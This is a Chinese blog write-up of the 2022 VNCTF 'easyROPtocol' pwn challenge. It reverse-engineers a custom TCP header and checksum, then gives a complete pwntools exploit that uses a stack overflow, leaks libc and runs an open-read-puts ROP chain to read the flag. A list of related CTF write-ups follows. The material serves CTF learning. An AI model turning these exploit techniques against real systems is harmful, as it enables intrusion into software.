2022 VNCTF easyROPtocol

最新推荐文章于 2023-12-04 00:44:57 发布
最新推荐文章于 2023-12-04 00:44:57 发布
阅读量1.7k 收藏
点赞数
分类专栏: PWN 文章标签: 安全 pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/124055357
版权

一道协议逆向+orwROP的题,基本上难度在于给出符合要求的协议头和校验和

拿到题目:
在这里插入图片描述在打印的信息中我们可以获取到,这个程序是TCP protocol的C语言实现
于是先把TCP的头部结构拿过来:
在这里插入图片描述

首先进add函数里看看:
在这里插入图片描述
可以看到能够申请最多4个chunk,每个chunk最多0x1000
生成之后要通过check_head函数和check_sum的检测
首先看check_head:
在这里插入图片描述
从这里可以得到确定一些头部信息,如源端口和目的端口,还有urgent_ptr必须为0,等,还有一些属性只能缩小范围,如seq_num和ack_num这种,只限制了不能为0,还有lensyn*4似乎等于0x14和0x18都可以,我们先放在这里,接着往下看:

在这里插入图片描述

check_sum函数中,做的事情就是将tcp内容拼接到fakeipheadfa后面,然后每两字节转成一个short,进行异或

到这里我们仍然不能完全确定头部结构,再去submit函数中看看:
在这里插入图片描述

首先关注v6这个变量,一开始是1,每次加0x1000,必须和头部中的seq_num,所以这个属性的值确定下来了,应该是1,0x1001,0x2001,0x3001

然后根据if中的判断可以得知,4*lensyn不能等于0x14,所以lensyn应为0x18/4,
到这里确定下来的头部应该为:

p16(30318)+p16(10423)+p32(seq_num)+p32(1)+p16(6)+p16(1)+p16(checksum)+p16(0)+p16(1)+p16(0xffff)

校验和需要整个tcp包内容都确定下俩之后才能计算
seq_num则是固定的1或者0x1000*n+1

分析完tcp包结构,我们找找溢出点:

在这里插入图片描述

可以看到s距离rbp只有0x3020,而我们赋值4次0x1000大小的东西到栈上,所以第四次会造成一个大面积的栈溢出

之后就正常rop执行一个orw即可:

from re import L
from pwn import *
from ctypes import *
import base64
from Crypto.Util.number import *
#context.log_level = 'debug'
io = process('./pwn')
#io = remote('52.59.124.14',10200)
libc = ELF('./libc-2.31.so')
elf=ELF("./pwn")
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def getcheck(buf):
        sum=0
        s="fakeipheadfa"
        for i in range(len(s)/2):
                sum^=int(s[:2][::-1].encode("hex"),16)
                s=s[2:]
        while len(buf)!=0:
                sum^=bytes_to_long(buf[:2][::-1])
                buf=buf[2:]
        return sum
def pk(seq_num,buf,pad):
        tcp=p16(30318)+p16(10423)+p32(seq_num)+p32(1)+p16(6)+p16(1)+p16(0)*2+p16(1)+p16(0xffff)+buf
        tcp=tcp.ljust(0x1000,pad)
        checksum=getcheck(tcp)
        tcp=tcp[:16]+p16(checksum)+tcp[18:]
        return tcp
def menu(choice):
        sla("4. Quit.\n",str(choice))
def read_tcp(payload):
        menu(1)
        sleep(0.1)
        io.send(payload)
def delete(i):
        menu(2)
        sleep(0.1)
        io.sendlineafter("Which?",str(i))
def submit():
        menu(3)
rdi_ret=0x0000000000401bb3
rsi_ret = 0x0000000000401bb1
main=0x401a5e
write_plt=elf.plt['write']
write_got=elf.got['write']
read_tcp(pk(1,'a'*8,'b'))
read_tcp(pk(0x1001,'a'*8,'b'))
read_tcp(pk(0x2001,'a'*8,'b'))
payload='a'*0x70
payload+=p64(rdi_ret)+p64(1)+p64(rsi_ret)+p64(write_got)+p64(0)+p64(write_plt)+p64(main)
read_tcp(pk(0x3001,payload,'\x00'))
submit()
ru('Done.\n')
libcbase=u64(io.recv(6).ljust(8,'\x00'))-libc.sym['write']
lg("libcbase")
rdx = 0x0000000000119241
bss = 0x404240
delete(0)
delete(1)
delete(2)
delete(3)
read_tcp(pk(1, "aaaa",'a'))
read_tcp(pk(0x1001, "aaaa",'a'))
read_tcp(pk(0x2001, "aaaa",'a'))
payload = ('a'*96+'a'*(0x10-6))
payload +=p64(rdi_ret)+p64(0)+p64(rsi_ret)+p64(bss)+p64(0)+p64(rdx+libcbase)+p64(0x6)+p64(0)+p64(libcbase+libc.sym['read'])
payload += p64(rdi_ret)+p64(bss)+p64(rsi_ret)+p64(0)+p64(0)+p64(libcbase+libc.sym['open'])
payload +=p64(rdi_ret)+p64(3)+p64(rsi_ret)+p64(bss)+p64(0)+p64(rdx+libcbase)+p64(0x30)+p64(0)+p64(libcbase+libc.sym['read'])
payload += p64(rdi_ret)+p64(bss)+p64(libcbase+libc.sym['puts'])
read_tcp(pk(0x3001, payload,'\x00'))
gdb.attach(io,'b*0x401a5c')
submit()
sleep(1)
io.recv()
io.sendline("flag\x00")
irt()

在这里插入图片描述

Ayakaaaa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
“百度杯”CTF比赛 十二月场easypwn
红凳子的博客
04-04 519
“百度杯”CTF比赛 十二月场easypwn前言一、程序分析二、漏洞利用exploit 前言 在这篇文章中将学习到泄露canary、ret2scu和ret2syscall 一、程序分析 从中可以看出该程序为64位动态链接的ELF文件,开启了canary保护,需要想办法绕过。 绕过canary的方法分为两种,一种为直接泄露canary的值,另一种为覆盖canary的值。 这里选择泄露canary的值,可以看出canary的位置在[rbp-8h]处,接着想办法泄露出[rbp-8h]处数据。 从源码中可以
基本ROP技巧总结
极目楚天舒的博客
05-06 5617
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3643
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
mrctf2020_easyrop
z1r0的博客
04-10 354
mrctf2020_easyrop 查看保护 简单题 用hehe和byby这两个函数配合起来rop就行 from pwn import * from time import sleep context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1
ctf pwn 萌新学习记录 基本rop(题目来自Wiki)
weixin_73481933的博客
01-04 1264
此后又发现在 secure 函数又发现了存在调用system(“/bin/sh”) 的代码,那么如果我们直接控制程序返回至 0x0804863A,那么就可以得到系统的 shell 了。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。下面就是我们如何构造 payload 了,首先需要确定的是我们能够控制的内存的起始地址距离 main 函数的返回地址的字节数。发现错了(原因:IDE可能会把栈的长度测量错了)
0CTF_2016_warmup(alarm在rop中控制eax,orw)
m0_51251108的博客
09-20 174
alarm妙用
PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop
QYbudong的博客
05-06 1478
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop
pwn】orw&rop --泄露libc基址,orw
最新发布
question55的博客
12-04 173
我们先看看程序的保护的情况因为题目提示了orw,我们可以沙箱检测一下可以发现是禁用的execve函数的,接着看函数逻辑这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:from pwn import *context(os='linux',arch='amd64',log_level='debug
CTF-PWN-ROPbaby(实验吧)
SuperGate的博客
02-07 1848
学rop的时候刷到的题,感觉很有启发于是就写下来。 本文很大程度上借鉴了如下文章: http://wzt.ac.cn/2018/04/02/ROP/ 进入正题。我们发现题目中给了我们libc的文件,在ropbaby程序中也可以直接查找libc基地址,因此我们就可以不用在主程序中寻找了。 首先我们查看ropbaby文件的保护方式 由于开了NX,shellcode的方式就不好弄了,因此我...
VNCTF2022 web全复现
Pysnow's Blog
04-07 2511
web 文章目录webGameV4.0gocalc0easyJ4va信息收集获取key反序列化newcalc0非预期PoC 1PoC 2预期解InterestingPHP解法一解法二 GameV4.0 前端小游戏题,直接想到查看js源代码 在data.js文件中搜索到了关键词flag,且后面附着着一个base64编码的字符串,解码试试 得到flag,再将其url解码一下就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 go语言的ssti,传入{{.}}指向当前的类,类似于
位图的光栅操作及ROP码解析
ChipArtist's Blogs
01-26 5436
位图的光栅操作及ROP码解析(SnowStart于2005年3月22日)位图是windows图形编程中非常重要的一个方面。在进行普通的位图操作中,如GDI函数BitBlt,StretchBlt, StretchDIBits,都会用到一个光栅操作码,即ROP码,像SRCCOPY,PATPAINT,SRCAND等,由于最近在开发图形驱动,涉及了许多的ROP2,ROP3和ROP4码的操作,对RO
orw (pwnable_orw和[V&N2020 公开赛]warmup)和 picoctf_2018_rop chain 记录笔记
carol2358的博客
05-21 1329
学到一种新的做法,orw(open,read,write),可以用在system,fork syscall(不能打开子进程,需要在当前进程里读入flag并输出) 和execve被禁的情况下打印出flag,还有seccomp 虽然还不太懂,但先记录一下目前的理解 seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。 著作权归作者所有。商业转
基本ROP
听鬼哥说故事
08-29 8602
随着NX保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是ROP(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上(这一条之后不再重复提及),通过利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而改变程序的执行流程。**所谓gadgets就是以ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
VNCTF2022-RE
qq_52974719的博客
02-23 1091
RE BabyMaze python3.8以上版本不可直接uncompyle反编译 用py38的dis或decompy++都可以反汇编 这里用decompy++ 执行 .\pycdas BabyMaze.pyc > code.txt 部分字节码如下 BabyMaze.pyc (Python 3.8) [Code] File Name: .\BabyMaze.py Object Name: <module> Arg Count: 0 Pos Only
VNCTF2022 WriteUp
mumuzi的博客
02-13 2803
VNCTF2022
2022 vnctf pwn clear_got
yongbaoii的博客
03-15 843
got表能覆写 没有canary pie 程序的逻辑很简单 一个栈溢出之后将got表全部清空。 给了两个系统调用。 那么我们的解题思路。 首先利用ret2csu来控制寄存器 payload = "a"*0x68 payload += p64(0x4007ea) payload += p64(0xc01c8) #rbx payload += p64(0xc01c9) #rbp payload += p64(0) #r12 payload += p64(59) #rdx payload += p64(0
VNCTF2022公开赛-misc-仔细找找(复现)
ookami6497的博客
03-12 879
放大发现里面大多数都是白点,而且还混有其他有颜色的点,前面地方能看出vn两个字母 参考这个大佬的博客说是要取出所有的杂色点 大佬的代码 from PIL import Image img = Image.open(r'g:\share\20220212\flag.png') w, h = img.size res = Image.new('RGB', (w//50, h//31), 255) for x in range(w): for y in range(h): ...
vnctf 2022 re复现
个人博客:http://s0rry.cn
03-09 5685
BabyMaze .pyc的文件,第一反应是用uncompyle6来直接逆。当然啦,肯定不会是我想的这么简单,我还是太年轻了,这道题有花指令让uncompyle6没法用。所以得先去花指令然后才能用工具逆字节码。 去花指令 开始我们并不知道有花指令,所以我们先看看字节码,这里用python的marshal库和dis库来读取二进制pyc文件并反汇编成字节码来分析: import dis,marshal fp = open('BabyMaze','rb').read() #这里用open只是打开了一个文件,还
VNCTF2022公开赛
shinygod的博客
03-15 411
gocalc0 00x1预期解 点击 把session拿去解码一下(末尾有==base64解码一下) 两次编码就出来了(本来我以为) 00x2非预期解 import ( _ "embed" "fmt" "os" "reflect" "strings" "text/template" "github.com/gin-contrib/sessions" "github.com/gin-contrib/sessions/cookie" "github.com/gin-gonic/gi
[VNCTF 2022]ezmath wp
bestkasscn的博客
02-28 755
[VNCTF 2022]ezmath wp 一个sha256爆破+一个数学问题,可以去百度一下,得到答案就是num * 4,但是查看源码可以发现要提交777次答案,所以只能写脚本来解决,这类交互题一般是去nc服务器,也可以使用python中的第三方库pwntools。 exp from hashlib import sha256 import random from pwn import * import string # 创建由大小写字母和数字组成的字典 dir = string.ascii_lette

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值